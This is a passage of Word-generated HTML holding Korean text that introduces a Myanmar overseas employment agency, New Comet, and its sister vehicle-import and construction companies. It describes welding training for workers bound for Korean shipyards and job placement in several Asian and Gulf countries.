Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">활동을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">시작하였습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희 <strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\"><strong>&nbsp;</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong>&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"New Comet Overseas Employment Agency\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는자매</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\"> </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야뉴코멧 자동차 판매 및 서비스 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧회사</strong>등</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기업들과</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">협력하여</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">경제통상자원부에서&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">차량</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">수입허가를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">신청했고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각종</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">상용트럭</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">관광</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산업 및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">운송에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사용되는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">다양한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">유형의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">버스</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">및</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기계를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직접</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">구매 판매하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">사업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 25</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">년</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;mso-spacerun:yes;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">종사해</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">왔고 나라를 위한 정한 세금들을 냈습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">. </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">게다가</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">100 </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명 이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">쌍둥이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">회사인</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>제야슈웨삐띡 건설 회사</strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"><strong>, </strong></span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>아웅네원 회사</strong>들은 정부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">부처로부터</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">입찰&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">(tender)</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">받고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">건설</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">작업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">동안</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\"> 200</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">명</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">이상의</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">직원에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">고용</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">기회를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공했습니다</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">저희&nbsp;</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>뉴코멧</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\"><strong>해외직업소개회사</strong></span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">\"</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">는 현재에</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">한국</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소들에 일하고 싶은 미얀마</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">각지에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">온</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">소수민족</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">형제들을 교통통신부</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">산하</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">씬마락</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\"> (Sinmalike)</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">조선소에 트레이너들와 함께 훌령한 기능공이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">되도록</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">용접수업을</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">제공하고</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">있으며</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업할 수 있게 취업들을 연계시키고 도와주고 있습니다</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">.</span><o:p></o:p></p><p class=\"MsoNormal\"><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">또한</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">두바이</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">말레이시아</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">싱가포</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\">,&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">태국</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\">, </span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일본 같은</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">국가에서</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">일하기를</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">원하는</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">청년들에게</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" lang=\"KO\">취업</span><span style=\"font-size:12.0pt;line-height:107%;mso-fareast-language:KO;\" lang=\"KO\">&nbsp;</span><span style=\"font-family:&quot;Malgun Gothic&quot;,sans-serif;font-size:12.0pt;line-height:107%;mso-bidi-font-family:&quot;Malgun Gothic&quot;;mso-fareast-language:KO;\" 